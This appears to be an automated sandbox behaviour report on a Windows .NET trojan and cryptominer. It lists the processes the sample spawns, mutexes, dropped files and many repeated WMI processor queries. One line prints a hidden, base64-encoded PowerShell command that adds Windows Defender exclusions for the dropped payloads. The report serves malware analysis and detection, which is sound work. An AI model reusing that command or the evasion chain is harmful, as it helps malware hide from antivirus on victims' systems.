Source: glmIOFfdMi.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YZRVUYjilL.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5.2.RegAsm.exe.436060.0.raw.unpack, WrapperVisitorProperty.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegAsm.exe.436060.0.raw.unpack, ValClassDeSerializer.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegAsm.exe.436060.0.raw.unpack, ValClassDeSerializer.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@41/21@4/4

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT54FFSL7ET46RASB.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:304:WilStaging_02
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Mutant created: \Sessions\1\BaseNamedObjects\fe5d05a685
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\2bd1368522bdabd3d66d2b
Source: C:\Users\user\AppData\Roaming\l6E.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\da7338787e9b834e9e79c74b3d1a3942
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8788:304:WilStaging_02
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9052
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7824:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:120:WilError_03

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

File created: C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat

Jump to behavior

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat" "

Source: PT54FFSL7ET46RASB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PT54FFSL7ET46RASB.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PT54FFSL7ET46RASB.exe	ReversingLabs: Detection: 34%
Source: PT54FFSL7ET46RASB.exe	Virustotal: Detection: 38%

Source: unknown	Process created: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe "C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe"
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe "C:\Users\user\AppData\Roaming\glmIOFfdMi.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe "C:\Users\user\AppData\Roaming\YZRVUYjilL.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
